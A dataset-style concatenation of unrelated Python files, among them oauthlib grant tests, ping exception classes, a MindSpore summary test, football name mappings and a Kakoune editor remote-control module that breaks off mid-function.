self.data = data
self.method = method
self.map_method = map_method
def map(self, content):
return self.map_method(content)
class BaseApi(object):
def __init__(self, client):
self.client = client
def make_ns(self, ns):
return {
"cp": ns
}
def val(self, data, xpath, ns):
return self.elems(data, xpath, ns)[0].text
def elems(self, data, xpath, ns):
return data.xpath(xpath, namespaces=ns)
def parse_xml(self, data):
node = etree.fromstring(data)
remove_xmlns(node)
return node
def make_ns(namespace):
return {
'cp': namespace
}
def method(
path=None,
content_type=None,
xmlns=None,
method=Methods.GET,
headers=None,
**kw
):
if headers is None:
headers = {}
if content_type:
headers['Content-Type'] = content_type
headers['Accept'] = content_type
if xmlns:
namespace = make_ns(xmlns)
kw['ns'] = namespace
else:
namespace = None
def wrap(func):
def _inner(self, data=None, params=None, **kwargs):
"""
The actual method being called when wrapping the methods of
the class.
Attributes:
self (Api): The API class being passed
obj (string): xml data being passed for post requests
params (dict): key/value container for GET params
"""
if params is None:
params = {}
else:
params = params.copy()
params.update(kwargs)
def handle_result_proxy(content):
return func(self, content, **kw.copy())
request = Request(
path=path,
headers=headers,
data=data,
params=params,
method=method,
map_method=handle_result_proxy
)
# Pass the request to the client and return the response
return self.client.send_request(request)
return _inner
return wrap
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from ...unittest import TestCase
import json
import mock
from oauthlib import common
from oauthlib.common import Request
from oauthlib.oauth2.rfc6749.errors import UnsupportedGrantTypeError
from oauthlib.oauth2.rfc6749.errors import InvalidRequestError
from oauthlib.oauth2.rfc6749.errors import InvalidClientError
from oauthlib.oauth2.rfc6749.errors import InvalidGrantError
from oauthlib.oauth2.rfc6749.grant_types import AuthorizationCodeGrant
from oauthlib.oauth2.rfc6749.grant_types import ImplicitGrant
from oauthlib.oauth2.rfc6749.grant_types import ResourceOwnerPasswordCredentialsGrant
from oauthlib.oauth2.rfc6749.grant_types import ClientCredentialsGrant
from oauthlib.oauth2.rfc6749.grant_types import RefreshTokenGrant
from oauthlib.oauth2.rfc6749.tokens import BearerToken
class RequestValidatorTest(TestCase):
def test_client_id(self):
pass
def test_client(self):
pass
def test_response_type(self):
pass
def test_scopes(self):
pass
def test_redirect_uri(self):
pass
class AuthorizationCodeGrantTest(TestCase):
def setUp(self):
self.request = Request('http://a.b/path')
self.request.scopes = ('hello', 'world')
self.request.expires_in = 1800
self.request.client = 'batman'
self.request.client_id = 'abcdef'
self.request.code = '1234'
self.request.response_type = 'code'
self.request.grant_type = 'authorization_code'
self.request_state = Request('http://a.b/path')
self.request_state.state = 'abc'
self.mock_validator = mock.MagicMock()
self.mock_validator.authenticate_client.side_effect = self.set_client
self.auth = AuthorizationCodeGrant(request_validator=self.mock_validator)
def set_client(self, request):
request.client = mock.MagicMock()
request.client.client_id = 'mocked'
return True
def test_create_authorization_grant(self):
grant = self.auth.create_authorization_code(self.request)
self.assertIn('code', grant)
grant = self.auth.create_authorization_code(self.request_state)
self.assertIn('code', grant)
self.assertIn('state', grant)
def test_create_token_response(self):
bearer = BearerToken(self.mock_validator)
u, h, token, s = self.auth.create_token_response(self.request, bearer)
token = json.loads(token)
self.assertIn('access_token', token)
self.assertIn('refresh_token', token)
self.assertIn('expires_in', token)
self.assertIn('scope', token)
def test_validate_token_request(self):
mock_validator = mock.MagicMock()
auth = AuthorizationCodeGrant(request_validator=mock_validator)
request = Request('http://a.b/path')
self.assertRaises(UnsupportedGrantTypeError,
auth.validate_token_request, request)
request.grant_type = 'authorization_code'
self.assertRaises(InvalidRequestError,
auth.validate_token_request, request)
mock_validator.authenticate_client.return_value = False
mock_validator.authenticate_client_id.return_value = False
request.code = 'waffles'
self.assertRaises(InvalidClientError,
auth.validate_token_request, request)
request.client = 'batman'
mock_validator.authenticate_client = self.set_client
mock_validator.validate_code.return_value = False
self.assertRaises(InvalidGrantError,
auth.validate_token_request, request)
class ImplicitGrantTest(TestCase):
def setUp(self):
mock_client = mock.MagicMock()
mock_client.user.return_value = 'mocked user'
self.request = Request('http://a.b/path')
self.request.scopes = ('hello', 'world')
self.request.client = mock_client
self.request.client_id = 'abcdef'
self.request.response_type = 'token'
self.request.state = 'xyz'
self.request.redirect_uri = 'https://b.c/p'
self.mock_validator = mock.MagicMock()
self.auth = ImplicitGrant(request_validator=self.mock_validator)
def test_create_token_response(self):
bearer = BearerToken(self.mock_validator, expires_in=1800)
orig_generate_token = common.generate_token
self.addCleanup(setattr, common, 'generate_token', orig_generate_token)
common.generate_token = lambda *args, **kwargs: '1234'
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
correct_uri = 'https://b.c/p#access_token=1234&token_type=Bearer&expires_in=1800&state=xyz&scope=hello+world'
self.assertURLEqual(uri, correct_uri, parse_fragment=True)
def test_error_response(self):
pass
class ResourceOwnerPasswordCredentialsGrantTest(TestCase):
def setUp(self):
mock_client = mock.MagicMock()
mock_client.user.return_value = 'mocked user'
self.request = Request('http://a.b/path')
self.request.grant_type = 'password'
self.request.username = 'john'
self.request.password = 'doe'
self.request.client = mock_client
self.request.scopes = ('mocked', 'scopes')
self.mock_validator = mock.MagicMock()
self.auth = ResourceOwnerPasswordCredentialsGrant(
request_validator=self.mock_validator)
def test_create_token_response(self):
bearer = BearerToken(self.mock_validator)
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
token = json.loads(body)
self.assertIn('access_token', token)
self.assertIn('token_type', token)
self.assertIn('expires_in', token)
self.assertIn('refresh_token', token)
def test_error_response(self):
pass
def test_scopes(self):
pass
class ClientCredentialsGrantTest(TestCase):
def setUp(self):
mock_client = mock.MagicMock()
mock_client.user.return_value = 'mocked user'
self.request = Request('http://a.b/path')
self.request.grant_type = 'client_credentials'
self.request.client = mock_client
self.request.scopes = ('mocked', 'scopes')
self.mock_validator = mock.MagicMock()
self.auth = ClientCredentialsGrant(
request_validator=self.mock_validator)
def test_create_token_response(self):
bearer = BearerToken(self.mock_validator)
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
token = json.loads(body)
self.assertIn('access_token', token)
self.assertIn('token_type', token)
self.assertIn('expires_in', token)
def test_error_response(self):
pass
def test_validate_token_response(self):
# wrong grant type, scope
pass
class RefreshTokenGrantTest(TestCase):
def setUp(self):
mock_client = mock.MagicMock()
mock_client.user.return_value = 'mocked user'
self.request = Request('http://a.b/path')
self.request.grant_type = 'refresh_token'
self.request.refresh_token = 'lsdkfhj230'
self.request.client = mock_client
self.request.scope = 'foo'
self.mock_validator = mock.MagicMock()
self.auth = RefreshTokenGrant(
request_validator=self.mock_validator)
def test_create_token_response(self):
self.mock_validator.get_original_scopes.return_value = ['foo', 'bar']
bearer = BearerToken(self.mock_validator)
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
token = json.loads(body)
self.assertIn('access_token', token)
self.assertIn('token_type', token)
self.assertIn('expires_in', token)
self.assertEqual(token['scope'], 'foo')
def test_create_token_inherit_scope(self):
self.request.scope = None
self.mock_validator.get_original_scopes.return_value = ['foo', 'bar']
bearer = BearerToken(self.mock_validator)
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
token = json.loads(body)
self.assertIn('access_token', token)
self.assertIn('token_type', token)
self.assertIn('expires_in', token)
self.assertEqual(token['scope'], 'foo bar')
def test_invalid_scope(self):
self.mock_validator.get_original_scopes.return_value = ['baz']
bearer = BearerToken(self.mock_validator)
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
token = json.loads(body)
self.assertEqual(token['error'], 'invalid_scope')
self.assertEqual(status_code, 401)
def test_invalid_token(self):
self.mock_validator.validate_refresh_token.return_value = False
bearer = BearerToken(self.mock_validator)
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
token = json.loads(body)
self.assertEqual(token['error'], 'invalid_grant')
self.assertEqual(status_code, 400)
def test_invalid_client(self):
self.mock_validator.authenticate_client.return_value = False
bearer = BearerToken(self.mock_validator)
uri, headers, body, status_code = self.auth.create_token_response(
self.request, bearer)
token = json.loads(body)
self.assertEqual(token['error'], 'invalid_client')
self.assertEqual(status_code, 401)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from .replay_base import ReplayBufferBase, PrioritizedReplayBufferBase
from .simple_replay import SimpleReplayBuffer
from .prioritized_replay import PrioritizedReplayBuffer
|
nilq/baby-python
|
python
|
class PingError(Exception):
pass
class TimeExceeded(PingError):
pass
class TimeToLiveExpired(TimeExceeded):
def __init__(self, message="Time exceeded: Time To Live expired.", ip_header=None, icmp_header=None):
self.ip_header = ip_header
self.icmp_header = icmp_header
self.message = message
super().__init__(self.message)
class DestinationUnreachable(PingError):
def __init__(self, message="Destination unreachable.", ip_header=None, icmp_header=None):
self.ip_header = ip_header
self.icmp_header = icmp_header
self.message = message if self.ip_header is None else message + " (Host='{}')".format(self.ip_header.get("src_addr"))
super().__init__(self.message)
class DestinationHostUnreachable(DestinationUnreachable):
def __init__(self, message="Destination unreachable: Host unreachable.", ip_header=None, icmp_header=None):
self.ip_header = ip_header
self.icmp_header = icmp_header
self.message = message if self.ip_header is None else message + " (Host='{}')".format(self.ip_header.get("src_addr"))
super().__init__(self.message)
class HostUnknown(PingError):
def __init__(self, message="Cannot resolve: Unknown host.", dest_addr=None):
self.dest_addr = dest_addr
self.message = message if self.dest_addr is None else message + " (Host='{}')".format(self.dest_addr)
super().__init__(self.message)
class Timeout(PingError):
def __init__(self, message="Request timeout for ICMP packet.", timeout=None):
self.timeout = timeout
self.message = message if self.timeout is None else message + " (Timeout={}s)".format(self.timeout)
super().__init__(self.message)
|
nilq/baby-python
|
python
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test model train """
import os
import re
import tempfile
import shutil
import pytest
from mindspore import dataset as ds
from mindspore import nn, Tensor, context
from mindspore.nn.metrics import Accuracy
from mindspore.nn.optim import Momentum
from mindspore.dataset.transforms import c_transforms as C
from mindspore.dataset.transforms.vision import c_transforms as CV
from mindspore.dataset.transforms.vision import Inter
from mindspore.common import dtype as mstype
from mindspore.common.initializer import TruncatedNormal
from mindspore.ops import operations as P
from mindspore.train import Model
from mindspore.train.callback import SummaryCollector
from tests.summary_utils import SummaryReader
def conv(in_channels, out_channels, kernel_size, stride=1, padding=0):
"""weight initial for conv layer"""
weight = weight_variable()
return nn.Conv2d(in_channels, out_channels,
kernel_size=kernel_size, stride=stride, padding=padding,
weight_init=weight, has_bias=False, pad_mode="valid")
def fc_with_initialize(input_channels, out_channels):
"""weight initial for fc layer"""
weight = weight_variable()
bias = weight_variable()
return nn.Dense(input_channels, out_channels, weight, bias)
def weight_variable():
"""weight initial"""
return TruncatedNormal(0.02)
class LeNet5(nn.Cell):
"""Define LeNet5 network."""
def __init__(self, num_class=10, channel=1):
super(LeNet5, self).__init__()
self.num_class = num_class
self.conv1 = conv(channel, 6, 5)
self.conv2 = conv(6, 16, 5)
self.fc1 = fc_with_initialize(16 * 5 * 5, 120)
self.fc2 = fc_with_initialize(120, 84)
self.fc3 = fc_with_initialize(84, self.num_class)
self.relu = nn.ReLU()
self.max_pool2d = nn.MaxPool2d(kernel_size=2, stride=2)
self.flatten = nn.Flatten()
self.scalar_summary = P.ScalarSummary()
self.image_summary = P.ImageSummary()
self.histogram_summary = P.HistogramSummary()
self.tensor_summary = P.TensorSummary()
self.channel = Tensor(channel)
def construct(self, data):
"""define construct."""
self.image_summary('image', data)
output = self.conv1(data)
self.histogram_summary('histogram', output)
output = self.relu(output)
self.tensor_summary('tensor', output)
output = self.max_pool2d(output)
output = self.conv2(output)
output = self.relu(output)
output = self.max_pool2d(output)
output = self.flatten(output)
output = self.fc1(output)
output = self.relu(output)
output = self.fc2(output)
output = self.relu(output)
output = self.fc3(output)
self.scalar_summary('scalar', self.channel)
return output
def create_dataset(data_path, batch_size=32, repeat_size=1, num_parallel_workers=1):
"""create dataset for train or test"""
# define dataset
mnist_ds = ds.MnistDataset(data_path)
resize_height, resize_width = 32, 32
rescale = 1.0 / 255.0
rescale_nml = 1 / 0.3081
shift_nml = -1 * 0.1307 / 0.3081
# define map operations
resize_op = CV.Resize((resize_height, resize_width), interpolation=Inter.LINEAR) # Bilinear mode
rescale_nml_op = CV.Rescale(rescale_nml, shift_nml)
rescale_op = CV.Rescale(rescale, shift=0.0)
hwc2chw_op = CV.HWC2CHW()
type_cast_op = C.TypeCast(mstype.int32)
# apply map operations on images
mnist_ds = mnist_ds.map(input_columns="label", operations=type_cast_op, num_parallel_workers=num_parallel_workers)
mnist_ds = mnist_ds.map(input_columns="image", operations=resize_op, num_parallel_workers=num_parallel_workers)
mnist_ds = mnist_ds.map(input_columns="image", operations=rescale_op, num_parallel_workers=num_parallel_workers)
mnist_ds = mnist_ds.map(input_columns="image", operations=rescale_nml_op, num_parallel_workers=num_parallel_workers)
mnist_ds = mnist_ds.map(input_columns="image", operations=hwc2chw_op, num_parallel_workers=num_parallel_workers)
# apply DatasetOps
mnist_ds = mnist_ds.shuffle(buffer_size=10000) # 10000 as in LeNet train script
mnist_ds = mnist_ds.batch(batch_size, drop_remainder=True)
mnist_ds = mnist_ds.repeat(repeat_size)
return mnist_ds
class TestSummary:
"""Test summary collector the basic function."""
base_summary_dir = ''
mnist_path = '/home/workspace/mindspore_dataset/mnist'
@classmethod
def setup_class(cls):
"""Run before test this class."""
cls.base_summary_dir = tempfile.mkdtemp(suffix='summary')
@classmethod
def teardown_class(cls):
"""Run after test this class."""
if os.path.exists(cls.base_summary_dir):
shutil.rmtree(cls.base_summary_dir)
@pytest.mark.level0
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_summary_ascend(self):
"""Test summary ascend."""
context.set_context(mode=context.GRAPH_MODE)
self._run_network()
def _run_network(self, dataset_sink_mode=True):
lenet = LeNet5()
loss = nn.SoftmaxCrossEntropyWithLogits(is_grad=False, sparse=True, reduction="mean")
optim = Momentum(lenet.trainable_params(), learning_rate=0.1, momentum=0.9)
model = Model(lenet, loss_fn=loss, optimizer=optim, metrics={'acc': Accuracy()})
summary_dir = tempfile.mkdtemp(dir=self.base_summary_dir)
summary_collector = SummaryCollector(summary_dir=summary_dir, collect_freq=1)
ds_train = create_dataset(os.path.join(self.mnist_path, "train"))
model.train(1, ds_train, callbacks=[summary_collector], dataset_sink_mode=dataset_sink_mode)
ds_eval = create_dataset(os.path.join(self.mnist_path, "test"))
model.eval(ds_eval, dataset_sink_mode=dataset_sink_mode, callbacks=[summary_collector])
self._check_summary_result(summary_dir)
@staticmethod
def _check_summary_result(summary_dir):
summary_file_path = ''
for file in os.listdir(summary_dir):
if re.search("_MS", file):
summary_file_path = os.path.join(summary_dir, file)
break
assert not summary_file_path
with SummaryReader(summary_file_path) as summary_reader:
tags = set()
# Read the event that record by SummaryCollector.begin
summary_reader.read_event()
summary_event = summary_reader.read_event()
for value in summary_event.summary.value:
tags.add(value.tag)
# There will not record input data when dataset sink mode is True
expected_tags = ['conv1.weight/auto', 'conv2.weight/auto', 'fc1.weight/auto', 'fc1.bias/auto',
'fc2.weight/auto', 'histogram', 'image', 'scalar', 'tensor']
assert set(expected_tags) == tags
|
nilq/baby-python
|
python
|
import re
player_dict = {
"Fred": "Frederico Rodrigues de Paula Santos",
"Ki Sung-yueng": "Sung-yueng Ki",
"Solly March": "Solomon March",
"Jonny": "Jonathan Castro Otto",
"Felipe Anderson": "Felipe Anderson Pereira Gomes",
"Mat Ryan": "Mathew Ryan",
"Kenedy": "Robert Kenedy Nunes do Nascimento",
"Jorginho": "Jorge Luiz Frello Filho",
"Bernard": "Bernard Anício Caldeira Duarte",
"Romain Saiss": "Romain Saïss",
"Bernardo Silva": "Bernardo Mota Veiga de Carvalho e Silva",
"N'Golo Kanté": "N'Golo Kanté",
"João Moutinho": "João Filipe Iria Santos Moutinho",
"Franck Zambo": "André-Frank Zambo Anguissa",
"Fousseni Diabate": "Fousseni Diabaté",
"Jazz Richards": "Ashley Darel Jazz Richards",
"Danilo": "Danilo Luiz da Silva",
"Richarlison": "Richarlison de Andrade",
"Bernardo": "Bernardo Fernandes da Silva Junior",
"Fernandinho": "Fernando Luiz Rosa",
"Joselu": "Jose Luis Mato Sanmartín",
"Son Heung-Min": "Heung-Min Son",
"Diogo Dalot": "José Diogo Dalot Teixeira",
"José Izquierdo": "José Heriberto Izquierdo Mena",
"Fabri": "Fabricio Agosto Ramírez",
"Eddie Nketiah": "Edward Nketiah",
"Rui Patrício": "Rui Pedro dos Santos Patrício",
"Greg Cunningham": "Greg Cunninghamm",
"Junior Hoilett": "David Junior Hoilett",
"Isaac Success": "Isaac Success Ajayi",
"Xande Silva": "Alexandre Nascimento Costa Silva",
"Bruno": "Bruno Saltor Grau",
"Léo Bonatini": "Bonatini Lohner Maia Bonatini",
"André Gomes": "André Filipe Tavares Gomes",
"Kiko Femenía": "Francisco Femenía Far",
"Dele Alli": "Bamidele Alli",
"Ricardo Pereira": "Ricardo Domingos Barbosa Pereira",
"Sokratis": "Sokratis Papastathopoulos",
"Alisson": "Alisson Ramses Becker",
"Fabinho": "Fabio Henrique Tavares",
"Adrien Silva": "Adrien Sebastian Perruchet Silva",
"David de Gea": "David De Gea",
"Gabriel Jesus": "Gabriel Fernando de Jesus",
"Pedro": "Pedro Rodríguez Ledesma",
"Zanka": "Mathias Jorgensen",
"David Luiz": "David Luiz Moreira Marinho",
"Rúben Neves": "Rúben Diogo da Silva Neves",
"Ben Chilwell": "Benjamin Chilwell",
"Kepa": "Kepa Arrizabalaga",
"Emerson": "Emerson Palmieri dos Santos",
"Ederson": "Ederson Santana de Moraes",
"Chicharito": "Javier Hernández Balcázar",
"Rúben Vinagre": "Rúben Gonçalo Silva Nascimento Vinagre",
"Oriol Romeu": "Oriol Romeu Vidal",
"Lucas Moura": "Lucas Rodrigues Moura da Silva",
"Willian": "Willian Borges Da Silva",
}
team_dict = {
"Manchester City": "Man City",
"Tottenham": "Spurs",
"Manchester United": "Man Utd",
"Wolverhampton Wanderers": "Wolves"
}
desired_attributes = [
"xG",
"xA",
"key_passes",
"npg",
"npxG",
"xGChain",
"xGBuildup",
"shots",
"understat_history"
]
versus_pattern = re.compile(r"!fplbot\s+([A-zÀ-ÿ]+(?:[\s-][A-zÀ-ÿ]+)*)\s+(?:vs.|vs)\s+([A-zÀ-ÿ]+(?:[\s-][A-zÀ-ÿ]+)*)\s*(\d+)?")
to_fpl_team_dict = {
"arsenal fc": "arsenal",
"the gunners": "arsenal",
"afc bournemouth": "bournemouth",
"the cherries": "bournemouth",
"boscombe": "bournemouth",
"the seagulls": "brighton",
"albion": "brighton",
"brighton and hove albion": "brighton",
"brighton & hove albion": "brighton",
"brighton fc": "brighton",
"bha": "brighton",
"burnley fc": "burnley",
"the clarets": "burnley",
"chelsea fc": "chelsea",
"cfc": "chelsea",
"che": "chelsea",
"the pensioners": "chelsea",
"crystal palace fc": "crystal palace",
"cpfc": "crystal palace",
"cp": "crystal palace",
"the eagles": "crystal palace",
"the glaziers": "crystal palace",
"everton fc": "everton",
"the toffees": "everton",
"leicester city": "leicester",
"leicester city fc": "leicester",
"the foxes": "leicester",
"lfc": "liverpool",
"liverpool fc": "liverpool",
"mcfc": "man city",
"manchester city": "man city",
"manchester city fc": "man city",
"man city fc": "man city",
"citizens": "man city",
"mufc": "man utd",
"manchester united": "man utd",
"manchester utd": "man utd",
"man u": "man utd",
"man united": "man utd",
"the red devils": "man utd",
"red devils": "man utd",
"newcastle united": "newcastle",
"newcastle united fc": "newcastle",
"nufc": "newcastle",
"newcastle utd": "newcastle",
"the magpies": "newcastle",
"southampton fc": "southampton",
"the saints": "southampton",
"tottenham": "spurs",
"thfc": "spurs",
"tottenham hotspur": "spurs",
"tottenham hotspurs": "spurs",
"tottenham fc": "spurs",
"watford fc": "watford",
"wfc": "watford",
"the hornets": "watford",
"west ham united": "west ham",
"west ham utd": "west ham",
"the hammers": "west ham",
"west ham fc": "west ham",
"west ham united fc": "west ham",
"wolverhampton": "wolves",
"wolverhampton wanderers": "wolves",
"wolves fc": "wolves",
"wolverhampton fc": "wolves",
"wolverhampton wanderers fc": "wolves",
"the wanderers": "wolves",
"avfc": "aston villa",
"villa": "aston villa",
"the canaries": "norwich",
"sheffield": "sheffield utd",
"sheffield united": "sheffield utd",
"the blades": "sheffield utd"
}
fpl_team_names = [
"arsenal",
"aston villa",
"brighton",
"burnley",
"chelsea",
"crystal palace",
"everton",
"fulham",
"leicester",
"leeds",
"liverpool",
"man city",
"man utd",
"newcastle",
"norwich",
"sheffield utd",
"southampton",
"spurs",
"west brom"
"west ham",
"wolves"
]
twitter_usernames = {
"MCI": "ManCity",
"LIV": "LFC",
"ARS": "Arsenal",
"LEI": "LCFC",
"MUN": "ManUtd",
"CRY": "CPFC",
"SHU": "SheffieldUnited",
"SOU": "SouthamptonFC",
"WHU": "WestHam",
"BHA": "OfficialBHAFC",
"CHE": "ChelseaFC",
"EVE": "Everton",
"AVL": "AVFCOfficial",
"TOT": "SpursOfficial",
"NEW": "NUFC",
"WOL": "Wolves",
"BUR": "BurnleyOfficial",
"LEE": "LUFC",
"WBA": "WBA",
"FUL": "FulhamFC"
}
lineup_markers = [
("line", "up"),
("team", "news")
]
|
nilq/baby-python
|
python
|
from pycromanager import MagellanAcquisition, multi_d_acquisition_events, Bridge
import numpy as np
def hook_fn(event):
# if np.random.randint(4) < 2:
# return event
return event
def img_process_fn(image, metadata):
image[250:350, 100:300] = np.random.randint(0, 4999)
return image, metadata
# magellan example
acq = MagellanAcquisition(
# magellan_acq_index=0,
magellan_explore=True,
pre_hardware_hook_fn=hook_fn,
image_process_fn=img_process_fn,
)
acq.await_completion()
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from __future__ import print_function
from six.moves.queue import Queue
from subprocess import Popen, PIPE
from threading import Thread
import functools
import itertools as it
import os
import re
import six
import sys
import tempfile
import time
import utils
class Remote(object):
def __init__(self, session):
self.session = session
self.pre = lambda _: '%sh('
self.post = ')'
self.arg_config = {}
self.puns = True
self.argnames = []
self.sync_setup = False
self.required_names = {'client'}
def ret():
x = self.listen()
self.fifo_cleanup()
return x
self.ret = ret
@staticmethod
def _resolve(self_or_session):
if isinstance(self_or_session, Remote):
return self_or_session
else:
return Remote(self_or_session)
@staticmethod
def setup_reply_channel(self_or_session):
r = Remote._resolve(self_or_session)
r_pre = r.pre
r.pre = lambda f: r_pre(f) + '''
__reply_fifo_dir=$(mktemp -d)
__reply_fifo="${__reply_fifo_dir}/fifo"
mkfifo ${__reply_fifo}
'''
r.post = '''
\ncat ${__reply_fifo}
rm ${__reply_fifo}
rmdir ${__reply_fifo_dir}
''' + r.post
r.arg_config['reply_fifo'] = ('__reply_fifo', Args.string)
r.required_names.add('reply_fifo')
return r
@staticmethod
def asynchronous(self_or_session):
r = Remote._resolve(self_or_session)
r_ret = r.ret
r.ret = lambda: utils.fork()(r_ret)
return r
@staticmethod
def onclient(self_or_session, client, sync=True):
r = Remote._resolve(self_or_session)
r_pre = r.pre
r.pre = lambda f: 'eval -client ' + client + ' %(' + r_pre(f)
r.post = ')' + r.post
if not sync:
r.asynchronous(r)
return r
@staticmethod
def hook(self_or_session, scope, name, group=None, filter='.*',
sync_setup=False, client=None):
r = Remote._resolve(self_or_session)
r.sync_setup = sync_setup
group = ' -group ' + group if group else ''
filter = utils.single_quoted(filter)
cmd = 'hook' + group + ' ' + scope + ' ' + name + ' ' + filter + ' %('
r_pre = r.pre
r.pre = lambda f: cmd + r_pre(f)
r.post = ')' + r.post
r.ret = lambda: utils.fork(loop=True)(r.listen)
if client:
r.onclient(r, client)
return r
def _f_name(self):
return self.f.__name__.replace('_', '-')
@staticmethod
def command(self_or_session, params='0', enum=[],
sync_setup=False, sync_python_calls=False, hidden=False):
r = Remote._resolve(self_or_session)
r.sync_setup = sync_setup
def ret():
utils.fork(loop=True)(r.listen)
@functools.wraps(r.f)
def call_from_python(client, *args):
escaped = [utils.single_quoted(arg) for arg in args]
pipe(r.session, ' '.join([r._f_name()] + escaped), client,
sync=sync_python_calls)
return call_from_python
r.ret = ret
r_pre = r.pre
def pre(f):
s = 'def -allow-override -params {params} -docstring {docstring} {name} {hidden}'
s = s.format(name=r._f_name(),
params=params,
hidden=(hidden and "-hidden") or '',
docstring=utils.single_quoted(utils.deindent(f.__doc__ or '')))
if enum:
sh = '\n'.join('[ $kak_token_to_complete -eq {} ] && printf "{}\n"'.format(i, '\\n'.join(es))
for i, es in enumerate(enum))
s += ' -shell-candidates %{' + sh + '} '
s += ' %('
s += r_pre(f)
return s
r.pre = pre
r.post += ')'
return r
def _argnames(self):
names = set(self.required_names)
names.update(self.argnames)
if self.puns:
names.update(utils.argnames(self.f))
return list(names)
@staticmethod
def _msg(splices, fifo):
underscores = []
argsplice = []
for s in splices:
underscores.append('__' + s + '=${' + s + '//_/_u}')
argsplice.append('${__' + s + '//$__newline/_n}')
underscores = '\n'.join(underscores)
argsplice = '_s'.join(argsplice)
m = ["__newline='\n'"]
if '__args' in splices:
m.append('__args=""')
m.append('for __arg; do __args="${__args}_S${__arg//_/_u}"; done')
m.append(underscores)
m.append('echo -n "' + argsplice + '" > ' + fifo)
return '\n'.join(m)
def __call__(self, f):
self.f = f
splices, self.parse = Args.argsetup(self._argnames(), self.arg_config)
self.fifo, self.fifo_cleanup = _mkfifo()
msg = self.pre(f) + self._msg(splices, self.fifo) + self.post
pipe(self.session, msg, sync=self.sync_setup)
return self.ret()
def listen(self):
_debug(self.f.__name__ + ' ' + self.fifo + ' waiting for call...')
with open(self.fifo, 'r') as fp:
line = utils.decode(fp.readline()).rstrip()
if line == '_q':
self.fifo_cleanup()
_debug(self.fifo, 'demands quit')
raise RuntimeError('fifo demands quit')
_debug(self.f.__name__ + ' ' + self.fifo + ' replied:' + repr(line))
r = self.parse(line)
try:
def _pipe(msg, sync=False):
return pipe(self.session, msg, r['client'], sync)
r['pipe'] = _pipe
d = {}
if 'reply_fifo' in r:
d['reply_calls'] = 0
def reply(msg):
d['reply_calls'] += 1
with open(r['reply_fifo'], 'w') as fp:
fp.write(msg)
r['reply'] = reply
result = utils.safe_kwcall(self.f, r) if self.puns else self.f(r)
if 'reply_fifo' in r:
if d['reply_calls'] != 1:
print('!!! [ERROR] Must make exactly 1 call to reply, ' +
self.f + ' ' + self.r + ' made ' + d['reply_calls'],
file=sys.stderr)
return result
except TypeError as e:
print(str(e), file=sys.stderr)
def pipe(session, msg, client=None, sync=False):
"""
Send commands to a running Kakoune process.
If sync is true, this function will return after
the commands have been executed.
>>> with tempfile.NamedTemporaryFile() as tmp:
... kak = headless()
... pipe(kak.pid, 'edit ' + tmp.name, 'unnamed0', sync=True)
... pipe(kak.pid, 'exec itest<esc>', 'unnamed0')
... pipe(kak.pid, 'write', 'unnamed0', sync=True)
... print(utils.decode(tmp.read()).rstrip())
... pipe(kak.pid, 'quit', 'unnamed0', sync=True)
... kak.wait()
test
0
"""
if client:
import tempfile
name = tempfile.mktemp()
with open(name, 'wb') as tmp:
tmp.write(utils.encode(msg))
msg = u'eval -client {} "%sh`cat {}; rm {}`"'.format(client, name, name)
if sync:
fifo, fifo_cleanup = _mkfifo()
msg += u'\n%sh(echo done > {})'.format(fifo)
# _debug('piping: ', msg.replace('\n', ' ')[:70])
_debug('piping: ', msg)
if hasattr(session, '__call__'):
session(msg)
else:
p = Popen(['kak', '-p', str(session).rstrip()], stdin=PIPE)
p.stdin.write(utils.encode(msg))
p.stdin.flush()
p.stdin.close()
if sync:
_debug(fifo + ' waiting for completion...',
msg.replace('\n', ' ')[:60])
with open(fifo, 'r') as fifo_fp:
fifo_fp.readline()
_debug(fifo + ' going to clean up...')
fifo_cleanup()
_debug(fifo + ' done')
#############################################################################
# Kakoune commands
def select(cursors):
"""
A command to select some cursors.
>>> print(select([((1,2),(1,4)), ((3,1),(5,72))]))
select 1.2,1.4:3.1,5.72
"""
return 'select ' + ':'.join('%d.%d,%d.%d' % tuple(it.chain(*pos))
for pos in cursors)
def change(range, new_text):
"""
A command to change some text
>>> print(change(((1,2), (3,4)), 'test'))
select 1.2,3.4; execute-keys -draft ctest<esc>
"""
return select([range]) + '; execute-keys -draft c' + new_text + '<esc>'
def menu(options, auto_single=True):
"""
A command to make a menu.
Takes a list of 2-tuples of an entry and the command it executes.
>>> print(menu([('one', 'echo one'), ('two', 'echo two')]))
menu 'one' 'echo one' 'two' 'echo two'
>>> print(menu([('one', 'echo one')]))
echo one
>>> print(menu([('one', 'echo one')], auto_single=False))
menu 'one' 'echo one'
"""
options = list(options)
if len(options) == 1 and auto_single:
return options[0][1]
opts = utils.join(map(utils.single_quoted, it.chain(*options)))
return 'menu ' + opts
def complete(line, column, timestamp, completions):
u"""
Format completion for a Kakoune option.
>>> print(complete(5, 20, 1234, [
... ('__doc__', 'object’s docstring', '__doc__ (method)'),
... ('||', 'logical or', '|| (func: infix)')
... ]))
5.20@1234:__doc__|object’s docstring|__doc__ (method):\|\||logical or|\|\| (func\: infix)
"""
rows = (utils.join((utils.backslash_escape('|:', x) for x in c), sep='|')
for c in completions)
return u'{}.{}@{}:{}'.format(line, column, timestamp, utils.join(rows, sep=':'))
#############################################################################
# Arguments and argument parsers
class Args(object):
@staticmethod
def coord(s):
"""
Parse a Kakoune coordinate.
"""
return tuple(map(int, s.split('.')))
@staticmethod
def selection_desc(x):
"""
Parse a Kakoune selection description.
"""
